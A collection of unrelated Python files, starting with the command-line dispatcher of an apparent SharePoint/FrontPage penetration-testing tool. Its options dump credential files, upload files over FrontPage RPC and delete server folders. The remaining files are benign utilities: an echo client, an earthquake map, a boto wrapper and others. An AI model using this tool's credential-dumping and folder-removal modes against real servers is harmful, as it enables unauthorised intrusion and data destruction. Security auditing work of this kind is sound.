    urllib2.install_opener(opener)
    logger.info(
        "[+][devalias.net][NTLM authentication] Credentials enabled for " +
        user)
def main():
    """
    Command-line entry point: parse the options, print target info and
    dispatch to the selected audit / fingerprint / exploit module.

    Fixes over the original:
    * the IndexError handler called ``usage()`` without its required
      ``destination`` argument (a guaranteed TypeError); it now passes
      the parsed target;
    * ``options.loglevel`` was read although no ``--loglevel`` option
      is declared, raising AttributeError on every run that reached it;
      it is now read defensively with ``getattr`` (default: DEBUG);
    * the dead ``except None:`` clause was removed -- ``None`` is not
      an exception class, so matching it would itself raise TypeError.
    """
    check_python()
    banner()
    parser = optparse.OptionParser(
        usage="usage: %prog [options]",
        version="%prog 1.0")
    front_page = optparse.OptionGroup(parser, "Frontpage:")
    share_point = optparse.OptionGroup(parser, "Sharepoint:")
    mandatory = optparse.OptionGroup(parser, "Mandatory:")
    exploit = optparse.OptionGroup(
        parser,
        "Information Gathering and Exploit:")
    authentication = optparse.OptionGroup(
        parser,
        "Authentication [devalias.net]")
    general = optparse.OptionGroup(parser, "General:")
    mandatory.add_option(
        "-u", "--url", type="string",
        help="target url to scan with proper structure",
        dest="url")
    front_page.add_option(
        "-f", "--frontpage", type="choice", choices=['pvt', 'bin'],
        help="<FRONTPAGE = pvt | bin> -- to check access permissions on frontpage standard files in vti or bin directory",
        dest="frontpage")
    share_point.add_option(
        "-s", "--sharepoint", type="choice",
        choices=['forms', 'layouts', 'catalog'],
        help="<SHAREPOINT = forms | layouts | catalog> -- to check access permissions on sharepoint standard files in forms or layouts or catalog directory",
        dest="sharepoint")
    exploit.add_option(
        "-v", "--http_fingerprint", type="choice",
        choices=['ms_sharepoint', 'ms_frontpage'],
        help="<FINGERPRINT = ms_sharepoint | ms_frontpage> -- fingerprint sharepoint or frontpage based on HTTP headers",
        dest="fingerprint")
    exploit.add_option(
        "-d", "--dump", type="choice", choices=['dump', 'extract'],
        help="<DUMP = dump | extract> -- dump credentials from default sharepoint and frontpage files (configuration errors and exposed entries)",
        dest="dump")
    exploit.add_option(
        "-l", "--list", type="choice", choices=['list', 'index'],
        help="<DIRECTORY = list | index> -- check directory listing and permissions",
        dest="directory")
    exploit.add_option(
        "-e", "--exploit", type="choice",
        choices=[
            'rpc_version_check',
            'rpc_service_listing',
            'author_config_check',
            'rpc_file_upload',
            'author_remove_folder'],
        help="EXPLOIT = <rpc_version_check | rpc_service_listing | rpc_file_upload | author_config_check | author_remove_folder> -- exploit vulnerable installations by checking RPC querying, service listing and file uploading",
        dest="exploit")
    exploit.add_option(
        "-i", "--services", type="choice", choices=['serv', 'services'],
        help="SERVICES = <serv | services> -- checking exposed services",
        dest="services")
    authentication.add_option(
        "-a", "--auth-type", type="choice", choices=['ntlm'],
        help="AUTHENTICATION = <ntlm> -- Authenticate with NTLM user/pass",
        dest="authentication")
    general.add_option(
        "-x", "--examples", type="string",
        help="running usage examples",
        dest="examples")
    parser.add_option_group(front_page)
    parser.add_option_group(share_point)
    parser.add_option_group(mandatory)
    parser.add_option_group(exploit)
    parser.add_option_group(authentication)
    parser.add_option_group(general)
    options, arguments = parser.parse_args()
    try:
        target = options.url
        # devalias.net - Authentication
        if options.authentication == "ntlm":
            # Leave user/pass blank so the routine prompts interactively.
            # TODO: Enable commandline user/pass?
            enable_ntlm_authentication("", "", target)
        if target is not None:
            target_information(target)
        else:
            logger.info("[-] specify the options. use (-h) for more help")
            sys.exit(0)
        # No --loglevel option is declared above; honour one if a future
        # option adds it, otherwise stay at DEBUG.
        if getattr(options, "loglevel", None):
            logger.setLevel(options.loglevel)
        else:
            logger.setLevel(logging.DEBUG)
        if options.dump == "dump" or options.dump == "extract":
            logger.info(
                "\n[+]------------------------------------------------------------------------------------------------")
            logger.info(
                "[+] dumping (service.pwd | authors.pwd | administrators.pwd | ws_ftp.log) files if possible")
            logger.info(
                "[+]--------------------------------------------------------------------------------------------------\n")
            dump_credentials(target)
            success("password dumping")
            return
        elif options.exploit == "rpc_version_check":
            logger.info(
                "\n[+]-----------------------------------------------------------------------")
            logger.info(
                "[+] auditing frontpage RPC service ")
            logger.info(
                "[+]-------------------------------------------------------------------------\n")
            frontpage_rpc_check(target)
            success("module RPC version check")
            return
        elif options.exploit == "rpc_service_listing":
            logger.info(
                "\n[+]-----------------------------------------------------------------------")
            logger.info(
                "[+] auditing frontpage RPC service for fetching listing ")
            logger.info(
                "[+]-------------------------------------------------------------------------\n")
            frontpage_service_listing(target)
            success("module RPC service listing check")
            return
        elif options.exploit == "author_config_check":
            logger.info(
                "\n[+]-----------------------------------------------------------------------")
            logger.info(
                "[+] auditing frontpage configuration settings ")
            logger.info(
                "[+]-------------------------------------------------------------------------\n")
            frontpage_config_check(target)
            success("module RPC check")
            return
        elif options.exploit == "author_remove_folder":
            logger.info(
                "\n[+]-----------------------------------------------------------------------")
            logger.info(
                "[+] trying to remove folder from web server ")
            logger.info(
                "[+]-------------------------------------------------------------------------\n")
            frontpage_remove_folder(target)
            success("module remove folder check")
            return
        elif options.exploit == "rpc_file_upload":
            logger.info(
                "\n[+]-----------------------------------------------------------------------")
            logger.info(
                "[+] auditing file uploading misconfiguration ")
            logger.info(
                "[+]-------------------------------------------------------------------------\n")
            file_upload_check(target)
            success("module file upload check")
            return
        elif options.examples == "examples":
            usage(target)
            return
        elif options.directory == "list" or options.directory == "index":
            build_target(target, directory_check, dir_target)
            logger.info(
                "\n[+]-----------------------------------------------------------------------")
            logger.info(
                "[+] auditing frontpage directory permissions (forbidden | index | not exist)")
            logger.info(
                "[+]-------------------------------------------------------------------------\n")
            audit(dir_target)
            success("directory check")
            return
        elif options.frontpage == "bin":
            build_target(target, front_bin, refine_target)
            logger.info("\n[+]----------------------------------------")
            logger.info("[+] auditing frontpage '/_vti_bin/' directory")
            logger.info("[+]------------------------------------------\n")
            audit(refine_target)
            success("bin file access")
        elif options.frontpage == "pvt":
            build_target(target, front_pvt, pvt_target)
            logger.info(
                "\n[+]---------------------------------------------------------")
            logger.info(
                "[+] auditing '/_vti_pvt/' directory for sensitive information ")
            logger.info(
                "[+]-----------------------------------------------------------\n")
            audit(pvt_target)
            success("pvt file access")
            return
        elif options.fingerprint == "ms_sharepoint":
            dump_sharepoint_headers(target)
            logger.info("\n[+] sharepoint fingerprint module completed\n")
            return
        elif options.fingerprint == "ms_frontpage":
            fingerprint_frontpage(target)
            logger.info("\n[+] frontpage fingerprint module completed\n")
            return
        elif options.sharepoint == "layouts":
            build_target(
                target,
                sharepoint_check_layout,
                sharepoint_target_layout)
            logger.info(
                "\n[+]-----------------------------------------------------------------")
            logger.info(
                "[+] auditing sharepoint '/_layouts/' directory for access permissions ")
            logger.info(
                "[+]-------------------------------------------------------------------\n")
            audit(sharepoint_target_layout)
            success("layout file access")
            return
        elif options.sharepoint == "forms":
            build_target(
                target,
                sharepoint_check_forms,
                sharepoint_target_forms)
            logger.info(
                "\n[+]--------------------------------------------------------------")
            logger.info(
                "[+] auditing sharepoint '/forms/' directory for access permissions ")
            logger.info(
                "[+]----------------------------------------------------------------\n")
            audit(sharepoint_target_forms)
            success("forms file access")
            return
        elif options.sharepoint == "catalog":
            build_target(
                target,
                sharepoint_check_catalog,
                sharepoint_target_catalog)
            logger.info(
                "\n[+]-----------------------------------------------------------------")
            logger.info(
                "[+] auditing sharepoint '/catalog/' directory for access permissions")
            logger.info(
                "[+]------------------------------------------------------------------\n")
            audit(sharepoint_target_catalog)
            success("catalogs file access")
            return
        elif options.services == "serv" or options.services == "services":
            build_target(target, front_services, refine_target)
            logger.info(
                "\n[+]---------------------------------------------------------------")
            logger.info(
                "[+] checking exposed services in the frontpage/sharepoint directory")
            logger.info(
                "[+]-----------------------------------------------------------------\n")
            audit(refine_target)
            success("exposed services check")
        else:
            logger.info("[-] please provide the proper scanning options")
            logger.info(
                "[+] check help (-h) for arguments and url specification")
            sys.exit(0)
    except ValueError:
        logger.error(
            "[-] ValueError occurred. Improper option argument or url")
        logger.error("[+] check for help (-h) for more details")
        sys.exit(0)
    except TypeError:
        logger.error("[-] TypeError occcured. Missing option argument or url")
        logger.error("[+] check for help (-h) for more details")
        sys.exit(0)
    except IndexError:
        # Fix: usage() requires the destination argument.
        usage(target)
        sys.exit(0)
    except urllib2.HTTPError as h:
        logger.error("[-] HTTPError : %s" % h.code)
        logger.error(
            "[+] please specify the target with protocol handlers as http | https")
        sys.exit(0)
    except urllib2.URLError as u:
        logger.error("[-] URLError : %s" % u.args)
        logger.error(
            "[+] please specify the target with protocol handlers as http | https")
        sys.exit(0)
    except KeyboardInterrupt:
        logger.error("[-] halt signal detected, exiting the program\n")
        sys.exit(0)
# calling main -- script entry point when executed directly.
if __name__ == '__main__':
    main()
|
# Read n and a list of n integers; print the index of the element
# closest to the arithmetic mean (first such index on ties).
n = int(input())
al = list(map(int, input().split()))
ave = sum(al) / n
# min() returns the first index attaining the minimal distance, which
# matches the original strict-less-than update rule on ties.
ans = min(range(n), key=lambda i: abs(ave - al[i]))
print(ans)
|
import argparse
import socket

# Simple TCP echo client: send a greeting, print the server's reply.
parser = argparse.ArgumentParser(description='Task 1 Client')
parser.add_argument('--host', help='Hostname/IP to connect', default='127.0.0.1')
# BUG FIX: without type=int a user-supplied --port arrives as a string and
# socket.connect() raises TypeError; the default only worked because it was
# already an int.
parser.add_argument('--port', help='Port to connect', type=int, default=1337)
parser.add_argument('-b', '--buffer', help='Connection buffer size', type=int, default=1024)
args = parser.parse_args()

# The socket is a context manager, so it is closed even on error.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as conn:
    conn.connect((args.host, args.port))
    conn.sendall('Hello, server!\n'.encode())
    received = conn.recv(args.buffer).decode()
    print(received, end='')
|
from bokeh.io import curdoc
from bokeh.layouts import column
from bokeh.layouts import row
from bokeh.models import HoverTool
from bokeh.models import LinearColorMapper
from bokeh.models import Slider
from bokeh.plotting import figure
from bokeh.tile_providers import STAMEN_TERRAIN_RETINA
from bokeh.models.widgets import TextInput
from core.data_helper import ImportUsgsEarthquakeData
from bokeh.models import ColumnDataSource, TableColumn, DataTable, NumberFormatter
from bokeh.models.widgets import PreText
class ShakeMeToBokeh:
    """Bokeh application that maps USGS earthquakes.

    A minimum-magnitude text input and a year slider re-query the USGS data
    helper; one shared ColumnDataSource feeds both the map glyphs and the
    data table. Improvements over the previous revision: the two widget
    callbacks shared a duplicated body (factored into a single refresh
    helper) and the sources file handle was never closed.
    """

    _SOURCES_FILE = 'sources.txt'
    _TOOLS = "box_select,pan,wheel_zoom,box_zoom,reset,save"

    def __init__(self):
        self._earthquakes_count = 0
        # Shared data source: map layer and table both render from it.
        source_data_formated = dict(mag=[], place=[], year=[], url=[], magType=[], title=[], x=[], y=[])
        self.source_data = ColumnDataSource(data=source_data_formated)
        # Initial viewport, expressed in web-mercator coordinates.
        self._X_RANGE_DEFAULT = (-2000000, 6000000)
        self._Y_RANGE_DEFAULT = (-1000000, 7000000)

    def run(self):
        """Build symbology, widgets, map, layers and layout on curdoc."""
        self._symbology()
        self._bokeh_widgets()
        self._bokeh_map_init()
        self._bokeh_layers_init()
        self._source_text_elements()
        self._bokeh_map_layout()

    def _bokeh_map_init(self):
        """Create the mercator figure with a hover tool and a tile background."""
        hover = HoverTool(tooltips=[
            ("nom", "@title"),
            ("Lieu", "@place"),
            ("Annee", "@year"),
            ("magnitude", "@mag"),
        ])
        # set canvas
        self._plot = figure(
            title="USGS EarthQuakes !",
            plot_width=1024,
            plot_height=600,
            x_range=self._X_RANGE_DEFAULT,
            y_range=self._Y_RANGE_DEFAULT,
            x_axis_type="mercator",
            y_axis_type="mercator",
            output_backend="webgl",
            tools=[hover, self._TOOLS]
        )
        # set background map
        self._plot.add_tile(STAMEN_TERRAIN_RETINA)

    def _bokeh_map_layout(self):
        """Assemble the document layout: map, controls row, then the table."""
        layout = column(
            row(self._plot),
            row(self._mag_value_widget, self._slider_widget, self._sources_text),
            row(self._data_table),
        )
        curdoc().add_root(layout)
        curdoc().title = "USGS Earthquakes Viewer"

    def _bokeh_layers_init(self):
        """Add the earthquake circle layer and build the data table."""
        self._plot.circle(
            x='x',
            y='y',
            source=self.source_data,
            size='mag',
            color={'field': 'mag', 'transform': self._color_mapper},
            alpha=1,
            legend="earthquake"
        )
        mag_format = NumberFormatter(format='0.0')
        table_columns = [
            TableColumn(field="title", title="nom"),
            TableColumn(field="place", title="Localisation"),
            TableColumn(field="year", title="Année"),
            TableColumn(field="mag", title="Magnitude", formatter=mag_format),
            TableColumn(field="url", title="Détails"),
        ]
        self._data_table = DataTable(source=self.source_data, columns=table_columns, width=1024, height=250, editable=True)

    def _bokeh_widgets(self):
        """Create the magnitude input and the year slider and wire callbacks."""
        self._mag_value_widget = TextInput(value="5", title="Choisir la magnitude minimale:")
        self._mag_value_widget.on_change('value', self.__min_mag_value)
        self._slider_widget = Slider(start=1950, end=2019, value=1950, step=1, title="Barre temporelle")
        self._slider_widget.on_change('value', self.__slider_update)

    def __min_mag_value(self, attrname, old, new):
        # Both widgets trigger the same re-query; share one implementation.
        self.__refresh_source_data()

    def __slider_update(self, attrname, old, new):
        self.__refresh_source_data()

    def __refresh_source_data(self):
        """Query a one-year window at the slider year, filtered by the
        minimum magnitude, and push the result into the shared source."""
        data = ImportUsgsEarthquakeData(
            int(self._slider_widget.value),
            int(self._slider_widget.value) + 1,
            self._mag_value_widget.value
        ).run()
        print(len(data))  # debug output kept from the original callbacks
        self.source_data.data = self.__format_source_data(data)

    def __format_source_data(self, source_data):
        """
        Convert the helper's dataframe into plain-list columns for bokeh.

        :param source_data: geopandas.geodataframe.GeoDataFrame
        :return: dict
        """
        return dict(
            mag=source_data['mag'].tolist(),
            place=source_data['place'].tolist(),
            url=source_data['url'].tolist(),
            year=source_data['year'].tolist(),
            magType=source_data['magType'].tolist(),
            title=source_data['title'].tolist(),
            x=source_data['x'].tolist(),
            y=source_data['y'].tolist()
        )

    def _symbology(self):
        """Color mapper driving the circle fill by magnitude."""
        # NOTE(review): low=10 > high=1 reverses the color ramp — presumably
        # intentional (dark = strong quakes); confirm against the palette.
        self._color_mapper = LinearColorMapper(
            palette='Magma10',
            low=10,
            high=1
        )

    def _source_text_elements(self):
        """Load the data-attribution text shown next to the widgets."""
        # BUG FIX: use a context manager so the file handle is closed
        # (the original open(...).read() leaked it).
        with open(self._SOURCES_FILE, 'r') as handle:
            sources = handle.read()
        self._sources_text = PreText(
            text=sources,
            width=500,
            height=100
        )
ShakeMeToBokeh().run() |
import string
from typing import Union
from sc2 import UnitTypeId
class UnitCount:
    """Pairs a unit type with a (possibly fractional) count of those units."""

    def __init__(self, enemy_type: UnitTypeId, count: Union[int, float]):
        """
        :param enemy_type: the unit type being counted
        :param count: how many of that type (floats allowed, e.g. estimates)
        """
        assert isinstance(enemy_type, UnitTypeId)
        # Idiomatic single isinstance call with a tuple of types.
        assert isinstance(count, (int, float))
        self.count = count
        self.enemy_type: UnitTypeId = enemy_type

    def __str__(self) -> str:
        # e.g. "MARINE: 3.0"
        return "{}: {:.1f}".format(self.enemy_type.name, self.count)

    def to_short_string(self) -> str:
        """Abbreviated form: first three letters of the type name, lower-cased."""
        # BUG FIX: the return annotation was `string` (the stdlib *module*
        # imported at the top of the file), not the builtin type `str`.
        return "{} {:.1f}".format(self.enemy_type.name[:3].lower(), self.count)
|
import json
import itertools
from typing import (
Any,
)
from substratum.types import (
RPCEndpoint,
RPCResponse,
)
from substratum.utils import (
to_bytes,
to_text,
)
class BaseProvider:
    """Abstract transport for RPC calls; concrete providers override
    :meth:`make_request`."""

    def make_request(self, method: RPCEndpoint, params: Any) -> RPCResponse:
        """Send *method* with *params* to the backend and return its response."""
        raise NotImplementedError("Providers must implement this method")
class JSONBaseProvider(BaseProvider):
    """Provider base class that frames requests/responses as JSON-RPC 2.0."""

    def __init__(self) -> None:
        # Monotonically increasing id for outgoing JSON-RPC requests.
        self.request_counter = itertools.count()

    def decode_rpc_response(self, raw_response: bytes) -> RPCResponse:
        """Parse a raw JSON response body into a response mapping."""
        return json.loads(to_text(raw_response))

    def encode_rpc_request(self, method: RPCEndpoint, params: Any) -> bytes:
        """Serialize a JSON-RPC 2.0 envelope for *method* as UTF-8 bytes."""
        request_id = next(self.request_counter)
        payload = json.dumps({
            "jsonrpc": "2.0",
            "method": method,
            # Per JSON-RPC, omitted/empty params are sent as an empty list.
            "params": params or [],
            "id": request_id,
        })
        return to_bytes(text=payload)
|
from os import path
import sys
import subprocess
from typing import List
from ._make_experiment_csv import make_experiment_csv
def write_experiment(
        db_credentials:str, output_folder:str, image_ids,
        spot_channels:List[str], stain_channels:List[str] = None,
        nuc_channels:List[str] = None, metadata_format:str = 'micromanager',
        positions:List[int] = None, time:int=0,
        data_path:str = '/Volumes/imaging/czbiohub-imaging/',
        img_format: str = 'PNG'
):
    """
    Writes the spacetx format experiment files for analysis in starfish

    Parameters
    ----------
    db_credentials : str
        Path to the database credentials file
    output_folder : str
        Path to save the experiment files to
    image_ids : List[str]
        List of the image IDs to include in the data set. Each image id will be a "round" in starfish.
    spot_channels : List[str]
        A list of the channels containing the spots
    stain_channels : List[str]
        A list of the channels containing any auxillary stains
        (e.g., GFP or membrane stain for segmentation)
    nuc_channels : List[str]
        A list of the channels containing any nuclear stains (e.g., DAPI)
    metadata_format : str
        Format for the image metadata on imagingDB. For micromanager, set to 'micromanager'.
        Default value is 'micromanager'
    positions : List[int]
        Indices of the positions to download. Defaults to [0].
    time : int
        Index of the time point to download. The default value is 0.
    data_path : str
        Path to the image store volume
    img_format : str
        Image format passed to spacetx_biohub_writer. The default value is 'PNG'.
    """
    # BUG FIX: avoid a mutable default argument; None means "position 0 only".
    if positions is None:
        positions = [0]
    spots_file_path = path.join(output_folder, 'spots.csv')
    tile_width, tile_height = make_experiment_csv(
        db_credentials, spots_file_path, image_ids,
        spot_channels, metadata_format, positions, time,
        data_path
    )
    # Build the writer CLI as an argument list: no shell is involved and
    # paths containing spaces survive (the original built a shell=True string).
    csv_args = ['--csv-file', 'primary', spots_file_path]
    if stain_channels is not None:
        stain_file_path = path.join(output_folder, 'stain.csv')
        # NOTE(review): unlike the primary call, data_path is not forwarded
        # here -- presumably make_experiment_csv's default applies; confirm.
        _, _ = make_experiment_csv(
            db_credentials, stain_file_path, image_ids,
            stain_channels, metadata_format, positions, time
        )
        csv_args += ['--csv-file', 'stain', stain_file_path]
    if nuc_channels is not None:
        nuc_file_path = path.join(output_folder, 'nuclei.csv')
        _, _ = make_experiment_csv(
            db_credentials, nuc_file_path, image_ids,
            nuc_channels, metadata_format, positions, time
        )
        csv_args += ['--csv-file', 'nuclei', nuc_file_path]
    cmd = [
        'spacetx_biohub_writer',
        '--tile-width', str(tile_width),
        '--tile-height', str(tile_height),
        '--s3-prefix', data_path,
        '--output-dir', output_folder,
        '--image_format', img_format,
    ] + csv_args
    subprocess.call(cmd)
|
from setuptools import setup, find_packages

# Read the single-line package version from the VERSION file.
# BUG FIX: use context managers everywhere so file handles are closed
# (VERSION and README.md were previously opened and leaked).
with open("VERSION", encoding="utf8") as handle:
    version = handle.read().strip()

with open("requirements.txt", encoding="utf8") as handle:
    reqs = handle.readlines()

with open("requirements-dev.txt", encoding="utf8") as handle:
    dev_reqs = handle.readlines()

with open("README.md", encoding="utf8") as handle:
    long_description = handle.read()

setup(
    name="wgh-ner",
    version=version,
    author="Grayson Hilliard",
    author_email="grsn.hilliard@gmail.com",
    url="",
    description="",
    long_description=long_description,
    classifiers=[
        "Operating System :: POSIX",
        "Programming Language :: Python",
    ],
    # NOTE(review): find_packages("ner") searches under the "ner" directory
    # but setup() has no matching package_dir mapping -- confirm the packages
    # actually resolve; plain find_packages() may be what was intended.
    packages=find_packages("ner"),
    install_requires=reqs,
    extras_require={
        "dev": dev_reqs,
    },
    platforms="any",
)
|
# -*- coding: utf-8 -*-
#
# © 2015-2016 Krux Digital, Inc.
#
#
# Standard libraries
#
from functools import wraps
# Declare the baseboto class a metaclass to avoid
# it being used directly
from abc import ABCMeta, abstractmethod
import os
#
# Third party libraries
#
# For differences between version2 & version3, please see here:
# http://boto3.readthedocs.org/en/latest/guide/migration.html
# Version2
import boto
import boto.ec2
import boto.utils
# Version3
import boto3
from six import iteritems
#
# Internal libraries
#
from krux.logging import get_logger, LEVELS, DEFAULT_LOG_LEVEL
from krux.stats import get_stats
from krux.cli import get_parser, get_group
from krux_boto.util import RegionCode
# Constants
# Names of the environment variables consulted for AWS credentials and region.
ACCESS_KEY = 'AWS_ACCESS_KEY_ID'
SECRET_KEY = 'AWS_SECRET_ACCESS_KEY'
REGION = 'AWS_DEFAULT_REGION'
# Name used for this library's logger and stats prefix.
NAME = 'krux-boto'
# GOTCHA: This is not meant to be imported by another library. Thus, prefix with double underscore.
__DEFAULT_REGION = 'us-east-1'
# Defaults
# GOTCHA: If this is a simple string-to-string dictionary, values are evaluated on compilation.
# This may cause some serious hair pulling if the developer decides to change the environment variable
# and expect krux-boto to pick it up. Thus, make this a string-to-function dictionary
# so the values are evaluated on method call and get up-to-date value.
DEFAULT = {
    'log_level': lambda: DEFAULT_LOG_LEVEL,
    'access_key': lambda: os.environ.get(ACCESS_KEY),
    'secret_key': lambda: os.environ.get(SECRET_KEY),
    # GOTCHA: Unlike credentials, this is defaulted to environment variable, but not required. Create a default
    # fall-back value.
    'region': lambda: os.environ.get(REGION, __DEFAULT_REGION),
}
def __get_arguments(args=None, logger=None, stats=None):
    """
    Build the keyword-argument dictionary needed to instantiate a BaseBoto
    subclass, filling in any of args/logger/stats the caller did not supply.

    :param args: Namespace of arguments parsed by argparse
    :type args: argparse.Namespace
    :param logger: Logger, recommended to be obtained using krux.cli.Application
    :type logger: logging.Logger
    :param stats: Stats, recommended to be obtained using krux.cli.Application
    :type stats: kruxstatsd.StatsClient
    :return: A dictionary of arguments needed for BaseBoto.__init__()
    :rtype: dict
    """
    if not args:
        parser = get_parser()
        add_boto_cli_arguments(parser)
        # parse_known_args() yields (Namespace, leftover-args); only the
        # Namespace matters here -- we just need the boto options.
        args, _ = parser.parse_known_args()
    logger = logger or get_logger(name=NAME)
    stats = stats or get_stats(prefix=NAME)
    return {
        'log_level': getattr(args, 'boto_log_level', DEFAULT['log_level']()),
        'access_key': getattr(args, 'boto_access_key', DEFAULT['access_key']()),
        'secret_key': getattr(args, 'boto_secret_key', DEFAULT['secret_key']()),
        'region': getattr(args, 'boto_region', DEFAULT['region']()),
        'logger': logger,
        'stats': stats,
    }
def get_boto(args=None, logger=None, stats=None):
    """
    Return a usable Boto (boto2) object without creating a class around it.

    In a krux.cli context the 'args', 'logger' and 'stats' objects already
    exist; any that are missing are created with sensible defaults. (If
    add_boto_cli_arguments() was skipped during cli setup the object still
    works, but its options won't appear in --help output.)

    :param args: Namespace of arguments parsed by argparse
    :type args: argparse.Namespace
    :param logger: Logger, recommended to be obtained using krux.cli.Application
    :type logger: logging.Logger
    :param stats: Stats, recommended to be obtained using krux.cli.Application
    :type stats: kruxstatsd.StatsClient
    :return: Boto object created with the arguments, logger, and stats created or deduced
    :rtype: krux_boto.boto.Boto
    """
    kwargs = __get_arguments(args, logger, stats)
    return Boto(**kwargs)
def get_boto3(args=None, logger=None, stats=None):
    """
    Return a usable Boto3 object without creating a class around it.

    In a krux.cli context the 'args', 'logger' and 'stats' objects already
    exist; any that are missing are created with sensible defaults. (If
    add_boto_cli_arguments() was skipped during cli setup the object still
    works, but its options won't appear in --help output.)

    :param args: Namespace of arguments parsed by argparse
    :type args: argparse.Namespace
    :param logger: Logger, recommended to be obtained using krux.cli.Application
    :type logger: logging.Logger
    :param stats: Stats, recommended to be obtained using krux.cli.Application
    :type stats: kruxstatsd.StatsClient
    :return: Boto3 object created with the arguments, logger, and stats created or deduced
    :rtype: krux_boto.boto.Boto3
    """
    kwargs = __get_arguments(args, logger, stats)
    return Boto3(**kwargs)
# Designed to be called from krux.cli, or programs inheriting from it
def add_boto_cli_arguments(parser, include_log_level=True, include_credentials=True, include_region=True):
    """Register the boto option group on *parser*.

    Registration order is preserved (it determines --help output). Each
    include_* flag allows callers to opt out of a subset of the options.
    """
    boto_group = get_group(parser, 'boto')
    if include_log_level:
        boto_group.add_argument(
            '--boto-log-level',
            choices=list(LEVELS.keys()),
            default=DEFAULT['log_level'](),
            help="Verbosity of boto logging. (default: %(default)s)",
        )
    if include_credentials:
        boto_group.add_argument(
            '--boto-access-key',
            default=DEFAULT['access_key'](),
            help="AWS Access Key to use. Defaults to ENV[{0}]".format(ACCESS_KEY),
        )
        boto_group.add_argument(
            '--boto-secret-key',
            default=DEFAULT['secret_key'](),
            help="AWS Secret Key to use. Defaults to ENV[{0}]".format(SECRET_KEY),
        )
    if include_region:
        # Valid choices come from the static boto2 region table.
        boto_group.add_argument(
            '--boto-region',
            choices=[region.name for region in boto.ec2.regions()],
            default=DEFAULT['region'](),
            help=(
                "EC2 Region to connect to. Defaults to ENV[{0}]. If not ENV set, defaults to us-east-1.".format(REGION)
            ),
        )
class BaseBoto(metaclass=ABCMeta):
    """
    Abstract base class shared by the boto2 (Boto) and boto3 (Boto3) wrappers.

    Resolves log level, credentials and region from explicit arguments with
    fall-back to the DEFAULT providers (environment variables), warns when
    CLI-supplied credentials disagree with the ones passed in, and exports the
    chosen credentials into os.environ so the underlying boto library uses them.
    """
    # This is an abstract class, which prevents direct instantiation. See here
    # for details: https://docs.python.org/2/library/abc.html
    def __init__(
        self,
        log_level=None,
        access_key=None,
        secret_key=None,
        region=None,
        logger=None,
        stats=None,
    ):
        """
        :param log_level: Verbosity for the underlying boto library (a key of krux.logging.LEVELS)
        :param access_key: AWS access key; defaults to ENV[AWS_ACCESS_KEY_ID]
        :param secret_key: AWS secret key; defaults to ENV[AWS_SECRET_ACCESS_KEY]
        :param region: AWS region name; defaults to ENV[AWS_DEFAULT_REGION], then 'us-east-1'
        :param logger: Logger, recommended to be obtained using krux.cli.Application
        :param stats: Stats, recommended to be obtained using krux.cli.Application
        """
        # Private variables, not to be used outside this module
        self._name = NAME
        self._logger = logger or get_logger(self._name)
        self._stats = stats or get_stats(prefix=self._name)
        if log_level is None:
            log_level = DEFAULT['log_level']()
        if access_key is None:
            access_key = DEFAULT['access_key']()
        if secret_key is None:
            secret_key = DEFAULT['secret_key']()
        if region is None:
            region = DEFAULT['region']()
            if REGION not in os.environ:
                self._logger.debug(
                    "There is not a default region set in your environment variables. Defaulted to '%s'", region
                )
        # GOTCHA: Due to backward incompatible version change in v1.0.0, the users of krux_boto may
        # pass wrong credential. Make sure the passed credential via CLI is the same as one passed into this instance.
        parser = get_parser()
        add_boto_cli_arguments(parser)
        # GOTCHA: We only care about the credential arguments and nothing else.
        # Don't validate the arguments or parse other things. Let krux.cli do that.
        # BUG FIX: parse_known_args() returns a (Namespace, unknown-args) tuple.
        # The previous code kept the whole tuple, so the getattr() calls below
        # always fell back to None and the mismatch warnings never fired.
        args = parser.parse_known_args()[0]
        _access_key = getattr(args, 'boto_access_key', None)
        _secret_key = getattr(args, 'boto_secret_key', None)
        if _access_key is not None and _access_key != access_key:
            # Logger.warn is a deprecated alias of Logger.warning
            self._logger.warning(
                'You set a different boto-access-key in CLI. '
                'To avoid this error, consider using get_boto() function. '
                'For more information, please check README.'
            )
        if _secret_key is not None and _secret_key != secret_key:
            self._logger.warning(
                'You set a different boto-secret-key in CLI. '
                'To avoid this error, consider using get_boto() function. '
                'For more information, please check README.'
            )
        # Infer the loglevel, but set it as a property so the subclasses can
        # use it to set the loglevels on the loghandlers for their implementation
        self._boto_log_level = LEVELS[log_level]
        # this has to be 'public', so callers can use it. It's unfortunately
        # near impossible to transparently wrap this, because the boto.config
        # is initialized before we get here, and all the classes do a look up
        # at compile time. So overriding doesn't help; wrapping would mean
        # wrapping everything (including future features) and poking into the
        # implementation classes' guts. So we just store the region that was
        # asked for and let the caller use it. See the sample app for a howto.
        self.cli_region = region
        # if these are set, make sure we set the environment again
        # as well; that way the underlying boto calls will just DTRT
        # without the need to wrap all the functions.
        credential_map = {
            ACCESS_KEY: access_key,
            SECRET_KEY: secret_key,
        }
        for env_var, val in iteritems(credential_map):
            if val is None or len(val) < 1:
                self._logger.debug('Passed boto credentials is empty. Falling back to environment variable %s', env_var)
            else:
                # this way we can tell what credentials are being used,
                # without dumping the whole secret into the logs
                self._logger.debug('Setting boto credential %s', env_var)
                os.environ[env_var] = val
            # If at this point the environment variable is NOT set,
            # you didn't set it, and we didn't set it. At which point
            # boto will go off spelunking for .boto files or other
            # settings. Best be clear about this. Using 'if not' because
            # if you set it like this:
            #   $ FOO= ./myprog.py
            # It'll return an empty string, and we'd not catch it.
            if not os.environ.get(env_var, None):
                self._logger.debug(
                    'Boto environment credential %s NOT explicitly set ' +
                    '-- boto will look for a .boto file somewhere', env_var
                )

    def __getattr__(self, attr):
        """Proxies calls to ``boto.*`` methods."""
        # This way, we don't have to write: rv = Boto().boto.some_call
        # But can just write: rv = Boto().some_call
        # This also gives us hooks for future logging/timers/etc and
        # extended wrapping of things the attributes return if we so choose.
        self._logger.debug('Calling wrapped boto attribute: %s on %s', attr, self)
        attr = getattr(self._boto, attr)
        if callable(attr):
            self._logger.debug("Boto attribute '%s' is callable", attr)

            @wraps(attr)
            def wrapper(*args, **kwargs):
                return attr(*args, **kwargs)
            return wrapper
        return attr

    @abstractmethod
    def get_valid_regions(self):
        """
        Gets all AWS regions that Krux can access

        :return: A list of :py:class:`RegionCode.Region` for the known regions. For any new regions
                 for which the enum does not exist, just returns the name of the region as a string.
        :rtype: list[RegionCode.Region]
        """
        pass
class Boto(BaseBoto):
    """boto (version 2) wrapper; credential/region resolution lives in BaseBoto."""

    def __init__(self, *args, **kwargs):
        # Let the superclass resolve credentials, region and log level.
        super(Boto, self).__init__(*args, **kwargs)
